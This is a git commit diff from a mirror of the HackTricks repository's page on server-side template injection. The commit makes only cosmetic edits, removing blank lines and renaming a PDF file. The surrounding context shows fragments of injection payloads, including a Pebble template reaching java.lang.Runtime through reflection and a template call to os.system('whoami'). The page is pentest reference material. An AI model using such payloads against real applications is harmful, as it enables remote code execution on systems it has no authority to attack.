mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#3246] No subject
This commit is contained in:
parent
9e20834ca4
commit
0541da2258
1 changed files with 1 additions and 8 deletions
|
@ -274,9 +274,6 @@ New version of Pebble :
|
|||
{% endraw %}
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
{% set bytes = (1).TYPE
|
||||
.forName('java.lang.Runtime')
|
||||
.methods[6]
|
||||
|
@ -627,10 +624,6 @@ Check out the following page to learn tricks about **arbitrary command execution
|
|||
{% import foobar %} = Error
|
||||
{% import os %}
|
||||
{% endraw %}
|
||||
|
||||
|
||||
|
||||
|
||||
{{os.system('whoami')}}
|
||||
```
|
||||
|
||||
|
@ -942,7 +935,7 @@ Check the rest of [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/mast
|
|||
|
||||
## BlackHat PDF
|
||||
|
||||
{% file src="../../.gitbook/assets/EN-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-BlackHat-15.pdf" %}
|
||||
{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
|
||||
|
||||
## Related Help
|
||||
|
||||
|
|
Loading…
Reference in a new issue